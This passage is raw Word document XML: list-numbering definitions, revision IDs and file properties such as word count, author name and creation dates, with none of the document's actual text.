    <w:lvl w:ilvl="0" w:tplc="236A06F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E7297E4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6B1C93EA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="02BA0E9A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6EC4EC4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D82CB038">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E6D88D10">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="17B4BFB6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="493615B8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11D96834"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE4CB7FC"/>
    <w:lvl w:ilvl="0" w:tplc="C0C6117A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E586E3EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="813408D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="50F07846">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="729AEB38">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6FE64B02">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="10726BD2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EC8C4A46">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D0469086">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="125507C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6CEFEE0"/>
    <w:lvl w:ilvl="0" w:tplc="7DD4A212">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0A0CD388">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A4ACC5BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="293668E4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="57FE07EE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B6567BEA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3E8A8AA6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9C9818E6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A4168C7C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="134E5862"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="031C8AE2"/>
    <w:lvl w:ilvl="0" w:tplc="7B2CD206">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E5A458CA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="95A2D7E4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="00F4C7D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="71925B86">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AA643526">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7C50894C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="95E05DA4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DD6AB288">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1C593596"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DED668B6"/>
    <w:lvl w:ilvl="0" w:tplc="A1189274">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0D00F7BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8C10D99C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C7324AD0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8BE8CEC2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="949A837E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0D969736">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="732A7680">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8AC05844">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E1A76FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFBC8E56"/>
    <w:lvl w:ilvl="0" w:tplc="F5B6CC8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0FB29706">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="693EED60">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0A969BBE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="360822B4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CDF02662">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C0143B94">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="072C8C32">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F3F22D1E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E14548E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F64B02C"/>
    <w:lvl w:ilvl="0" w:tplc="3C7E3290">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="104CB73E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7B76DD94">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="02D60998">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8C0AF2F0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6C00D27A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="43686D24">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7CFC5D12">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D5C215F4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6CA54F71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3B4752E"/>
    <w:lvl w:ilvl="0" w:tplc="090C8C0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4DF63046">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="426443FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A8FA0B3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EB68A1C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9A36895A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A15E0660">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1124D250">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CABE81A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="438599215">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="52387748">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="857547532">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1201161416">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1176110100">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="975835914">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="571550716">
    <w:abstractNumId w:val="5"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="109787059">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="36032619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CEA"/>
    <w:rsid w:val="00083ED0"/>
    <w:rsid w:val="00531FCF"/>
    <w:rsid w:val="00C64CEA"/>
    <w:rsid w:val="00ED17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2C693"/>
  <w15:docId w15:val="{7B094260-4F37-4B24-A3D0-E2379BA57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6227</Words>
  <Characters>35497</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>295</Lines>
  <Paragraphs>83</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>41641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Haney Mamdouh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-24T21:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-25T21:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>